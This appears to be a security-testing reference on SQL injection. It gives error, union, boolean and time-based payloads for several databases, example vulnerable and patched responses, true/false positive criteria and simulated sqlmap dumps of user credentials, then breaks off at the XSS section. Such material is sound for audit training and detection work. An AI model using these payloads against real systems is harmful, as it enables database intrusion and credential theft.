# Attack Payloads & Response Patterns Reference
> Comprehensive reference for security audit simulation: real-world payloads, vulnerable/safe response patterns, tool output formats, and true/false positive indicators.
---
## Table of Contents
1. [SQL Injection](#1-sql-injection)
2. [Cross-Site Scripting (XSS)](#2-cross-site-scripting-xss)
3. [Server-Side Request Forgery (SSRF)](#3-server-side-request-forgery-ssrf)
4. [IDOR / BOLA](#4-idor--bola-broken-object-level-authorization)
5. [Server-Side Template Injection (SSTI)](#5-server-side-template-injection-ssti)
6. [Authentication Bypass / Default Credentials](#6-authentication-bypass--default-credentials)
7. [Security Misconfiguration](#7-security-misconfiguration)
8. [Cryptographic Failures](#8-cryptographic-failures)
9. [CSRF](#9-csrf-cross-site-request-forgery)
10. [XXE](#10-xxe-xml-external-entity)
11. [Path Traversal / LFI](#11-path-traversal--lfi)
12. [Command Injection](#12-command-injection)
13. [File Upload Vulnerabilities](#13-file-upload-vulnerabilities)
14. [Rate Limiting / Brute Force](#14-rate-limiting--brute-force)
15. [Open Redirect](#15-open-redirect)
16. [Information Disclosure](#16-information-disclosure)
---
## 1. SQL Injection
### 1.1 Test Payloads
#### Error-Based SQL Injection
```
# Basic error trigger
'
"
' OR '1'='1
" OR "1"="1
') OR ('1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
admin'--
1' AND 1=CONVERT(int,(SELECT @@version))--
# MySQL error-based extraction
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user()),0x7e),1)--
# MSSQL error-based
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT @@version) AS int)--
# Oracle error-based
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual))--
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))--
# PostgreSQL error-based
' AND 1=CAST((SELECT version()) AS int)--
',CAST(chr(126)||version()||chr(126) AS NUMERIC),'')--
```
#### Union-Based SQL Injection
```
# Step 1: Determine column count with ORDER BY
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' ORDER BY 4-- <-- if this errors, table has 3 columns
# Step 1 alt: Determine column count with UNION SELECT NULL
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# Step 2: Find displayable columns
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a'--
# Step 3: Extract data (3-column example)
' UNION SELECT username,password,NULL FROM users--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION ALL SELECT NULL,CONCAT(username,0x3a,password),NULL FROM users--
# MySQL specific
' UNION SELECT 1,GROUP_CONCAT(schema_name),3 FROM information_schema.schemata--
' UNION SELECT 1,GROUP_CONCAT(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
# PostgreSQL specific
' UNION SELECT NULL,version(),NULL--
' UNION SELECT NULL,string_agg(table_name,','),NULL FROM information_schema.tables--
```
#### Blind SQL Injection (Boolean-Based)
```
# Boolean-based detection
' AND 1=1-- (true condition - normal response)
' AND 1=2-- (false condition - different response)
# Character extraction
' AND SUBSTRING((SELECT database()),1,1)='a'--
' AND (SELECT ASCII(SUBSTRING((SELECT database()),1,1)))>97--
' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND LENGTH(password)>5)=1--
# MySQL
' AND IF(1=1,1,0)--
' AND IF(SUBSTRING(database(),1,1)='s',SLEEP(0),1)--
# PostgreSQL
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 1/(SELECT 0) END)=1--
```
#### Blind SQL Injection (Time-Based)
```
# MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
'; SELECT BENCHMARK(10000000,SHA1('test'))--
# PostgreSQL
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
# MSSQL
'; WAITFOR DELAY '0:0:5'--
' AND IF 1=1 WAITFOR DELAY '0:0:5'--
'; IF (SELECT COUNT(*) FROM sysobjects)>0 WAITFOR DELAY '0:0:5'--
# Oracle
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
```
### 1.2 Vulnerable Response Patterns
#### HTTP Response - Error-Based (MySQL)
```http
HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Apache/2.4.41 (Ubuntu)
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html/index.php on line 12
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
```
#### HTTP Response - Error-Based (MSSQL)
```http
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.
/products.asp, line 33
```
#### HTTP Response - Error-Based (Oracle)
```http
HTTP/1.1 500 Internal Server Error
ORA-01756: quoted string not properly terminated
ORA-00933: SQL command not properly ended
```
#### HTTP Response - Error-Based (PostgreSQL)
```http
HTTP/1.1 500 Internal Server Error
ERROR: unterminated quoted string at or near "'"
LINE 1: SELECT * FROM products WHERE id='1''
ERROR: invalid input syntax for type integer: "abc"
```
#### HTTP Response - Union-Based (Data Exfiltration)
```http
HTTP/1.1 200 OK
Content-Type: text/html
```
#### HTTP Response - Boolean Blind (True vs False)
```
# TRUE condition (' AND 1=1--)
HTTP/1.1 200 OK
Content-Length: 4538
Product: Widget Pro
Price: $29.99
# FALSE condition (' AND 1=2--)
HTTP/1.1 200 OK
Content-Length: 1204
No products found
```
#### HTTP Response - Time-Based Blind
```
# Non-injected request: Response time ~50ms
# Injected with SLEEP(5): Response time ~5050ms
# The 5-second delay confirms injection
```
### 1.3 Safe/Patched Response Patterns
```http
HTTP/1.1 400 Bad Request
Content-Type: application/json
{
"error": "Invalid input",
"message": "The provided value is not valid"
}
```
```http
HTTP/1.1 200 OK
Content-Type: application/json
{
"products": [],
"message": "No results found"
}
```
Key safe indicators:
- No database error messages leaked
- Parameterized query used (payload treated as literal string data)
- Input validation rejects special characters
- Generic error messages with no stack traces
- Same response for both `' AND 1=1--` and `' AND 1=2--`
- No measurable time difference with SLEEP/WAITFOR payloads
### 1.4 True Positive vs False Positive
| Indicator | True Positive | False Positive |
|-----------|---------------|----------------|
| Error message | Contains DB-specific syntax errors (MySQL, MSSQL, Oracle, PG) | Generic 500 error or WAF block page |
| Boolean blind | Consistently different response for true/false conditions across multiple tests | Single inconsistent difference (could be caching, race condition) |
| Time-based | Consistent delay matching injected sleep value (e.g., 5s for SLEEP(5), 10s for SLEEP(10)) | Random delays due to server load |
| Union-based | Actual data from other tables appears in response | Extra columns show NULL but no extractable data |
| WAF detection | Payload blocked with WAF signature (403 Forbidden, "Request blocked") | Actual SQL syntax error from the database engine |
### 1.5 Tool Output Examples
#### sqlmap Output (Vulnerable Target)
```
___
__H__
___ ___["]_____ ___ ___ {1.8.4#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal...
[*] starting @ 14:23:15 /2026-04-09/
[14:23:15] [INFO] testing connection to the target URL
[14:23:15] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:23:15] [INFO] testing if the target URL content is stable
[14:23:16] [INFO] target URL content is stable
[14:23:16] [INFO] testing if GET parameter 'id' is dynamic
[14:23:16] [INFO] GET parameter 'id' appears to be dynamic
[14:23:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[14:23:16] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[14:23:16] [INFO] testing for SQL injection on GET parameter 'id'
[14:23:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:23:17] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:23:17] [INFO] testing 'Generic inline queries'
[14:23:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:23:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:23:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:23:18] [INFO] GET parameter 'id' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' injectable
[14:23:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:23:28] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[14:23:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:23:28] [INFO] automatically extending ranges for UNION query injection technique tests
[14:23:29] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns.
[14:23:29] [INFO] target URL appears to have 3 columns in query
[14:23:30] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5639=5639 AND 'RdBg'='RdBg
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)
Payload: id=1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716b787871,(SELECT (ELT(4207=4207,1))),0x71766a7a71,0x78))x))-- -
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5765 FROM (SELECT(SLEEP(5)))SuCe) AND 'vbKl'='vbKl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7092' UNION ALL SELECT CONCAT(0x716b787871,0x4f724d6f4c52634f6c72,0x71766a7a71),NULL,NULL-- -
---
[14:23:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.4.3, Apache 2.4.41
back-end DBMS: MySQL >= 5.5
[14:23:30] [INFO] fetched data logged to text files under '/home/user/.local/share/sqlmap/output/target.example.com'
[*] ending @ 14:23:30 /2026-04-09/
```
#### sqlmap Database Enumeration Output
```
[14:25:01] [INFO] fetching database names
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] webapp_db
[14:25:02] [INFO] fetching tables for database: 'webapp_db'
Database: webapp_db
[3 tables]
+-----------+
| users |
| products |
| orders |
+-----------+
[14:25:03] [INFO] fetching columns for table 'users' in database 'webapp_db'
Database: webapp_db
Table: users
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(11) |
| username | varchar(50) |
| password | varchar(255)|
| email | varchar(100)|
+----------+-------------+
[14:25:04] [INFO] fetching entries for table 'users' in database 'webapp_db'
Database: webapp_db
Table: users
[3 entries]
+----+----------+----------------------------------------------+-------------------+
| id | username | password | email |
+----+----------+----------------------------------------------+-------------------+
| 1 | admin | $2b$12$LJ3m4ys3Lk0TdPmFBpKBOeJMUMmo7Xa5VjKf | admin@example.com |
| 2 | john | 5f4dcc3b5aa765d61d8327deb882cf99 | john@example.com |
| 3 | jane | password123 | jane@example.com |
+----+----------+----------------------------------------------+-------------------+
```
---
## 2. Cross-Site Scripting (XSS)
### 2.1 Test Payloads
#### Reflected XSS
```
# Basic payloads
">
'>